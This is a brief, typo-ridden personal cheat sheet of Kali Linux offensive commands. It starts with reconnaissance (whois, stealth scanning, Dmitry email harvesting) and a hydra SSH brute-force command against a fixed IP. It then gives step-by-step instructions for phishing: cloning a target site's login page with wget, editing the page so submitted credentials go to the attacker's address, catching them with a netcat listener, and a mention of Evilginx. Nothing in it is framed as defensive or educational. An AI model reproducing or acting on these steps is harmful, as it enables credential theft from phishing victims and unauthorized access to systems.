Kali Commands
Kali Commands
1. Whois.com
2. Sudo –sS ip address [for infor In a stealth way]
3. Dmitry –w website URL[for basic info of a website]
4. Dmitry –n website url [for get netcraft information]
5. Dmitry –e website url [for getting all the email address of a website]
Password Hacking
Brute force
1. hydra –l root /usr/share/wordlists/metasploit/unix_passwords.txt –t 6 ssh://192.168.1.123
Phishing Techniques
1. gophish interface [know every thing about this ]
site cloning
Got to google chrome latest user agent and In kali type wget --mirror --convert-
links --adjust-extension --page-requisites --no-parent
https://targeted site/identity/login –user-agent “Mozilla/5.0
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/120.0.0.0 Safari/537.36”
Is then enter
Cd website name/ then enter
Is then enter
Python –m http.server
Inspect the original page and change the landing page instead of original website
Is enter
Cd identity/
Is
Nano login.html{ modify here that login credentials will be send to our local ip address
In kali nc –lvvnp 8081
Cd..
Pyhon –m http.server
Evilginx